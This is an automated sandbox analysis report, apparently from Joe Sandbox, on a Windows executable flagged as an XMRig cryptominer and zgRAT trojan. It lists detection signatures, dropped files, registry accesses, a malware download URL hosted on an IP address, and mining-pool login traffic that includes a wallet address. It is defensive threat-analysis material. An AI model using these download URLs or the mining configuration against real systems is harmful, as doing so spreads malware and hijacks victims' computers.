Windows Analysis Report
e2kLb2J2Y7.exe

Overview

General Information

Sample Name: e2kLb2J2Y7.exe
Original Sample Name: 506761d4ae9aa7134c001c7f0b7b4827.exe
Analysis ID: 1345583
MD5: 506761d4ae9aa7134c001c7f0b7b4827
SHA1: 45b12d344817ca14e1f630da7f624b2093e7728d
SHA256: 36216f13d2670aadc24589c4810c4ef62e9370a4e3cf05f8015b1beb5e0c4a63
Tags: 64exetrojan
Infos:

Detection

Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Bypasses PowerShell execution policy
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Detected Stratum mining protocol
Suspicious powershell command line found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

barindex
Source: e2kLb2J2Y7.exe ReversingLabs: Detection: 57%
Source: e2kLb2J2Y7.exe Virustotal: Detection: 63% Perma Link
Source: e2kLb2J2Y7.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://163.123.142.171:8080/file/1699834997-Prvrec.exe Avira URL Cloud: Label: malware
Source: http://163.123.142.171:8080/file/1699834997-Prvrec.exe Virustotal: Detection: 12% Perma Link
Source: http://163.123.142.171:8080/file/1699833590-plugin3.dll Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Virustotal: Detection: 63% Perma Link
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Virustotal: Detection: 65% Perma Link
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Virustotal: Detection: 63% Perma Link
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Virustotal: Detection: 65% Perma Link
Source: e2kLb2J2Y7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Joe Sandbox ML: detected

Bitcoin Miner

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2395730311.00000001404B1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2395730311.00000001407AE000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7648, type: MEMORYSTR
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: XMRig 6.20.0
Source: global traffic TCP traffic: 192.168.2.6:49766 -> 163.123.142.171:8383 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44k2hl2woi2893k79nhdxhsdml8vlcccdx5hdn2f3d7fgrukkccqutfnxm5ftkq8skuejncioyxvgnqsrmhuc9qx268crgw.rig_cpu","pass":"x","agent":"xmrig/6.20.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: global traffic TCP traffic: 192.168.2.6:49769 -> 163.123.142.171:8383 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44k2hl2woi2893k79nhdxhsdml8vlcccdx5hdn2f3d7fgrukkccqutfnxm5ftkq8skuejncioyxvgnqsrmhuc9qx268crgw.rig_cpu","pass":"x","agent":"xmrig/6.20.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: global traffic TCP traffic: 192.168.2.6:49772 -> 163.123.142.171:8383 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44k2hl2woi2893k79nhdxhsdml8vlcccdx5hdn2f3d7fgrukkccqutfnxm5ftkq8skuejncioyxvgnqsrmhuc9qx268crgw.rig_cpu","pass":"x","agent":"xmrig/6.20.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: e2kLb2J2Y7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Vchwz.pdb source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2112901867.00000000034C0000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013D32000.00000004.00000800.00020000.00000000.sdmp, Key.exe, 00000004.00000002.2165294330.0000000014288000.00000004.00000800.00020000.00000000.sdmp, zhtyxulkfny.exe, 00000011.00000002.3066172573.0000000013A98000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Ndubaw.pdb source: xddtyli.exe, 00000009.00000002.2371258222.000001EEB7365000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2709105744.000001EEBF780000.00000004.08000000.00040000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB753D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 2.TaskScheduler.pdb source: xddtyli.exe, 00000009.00000002.2371258222.000001EEB7975000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.000000001411F000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2119559913.000000001D5D0000.00000004.08000000.00040000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Values.exe, 0000000C.00000002.2630079192.0000023277D83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 2.TaskScheduler.pdbSHA256e source: xddtyli.exe, 00000009.00000002.2371258222.000001EEB7975000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.000000001411F000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2119559913.000000001D5D0000.00000004.08000000.00040000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Values.exe, 0000000C.00000002.2630079192.0000023277D83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
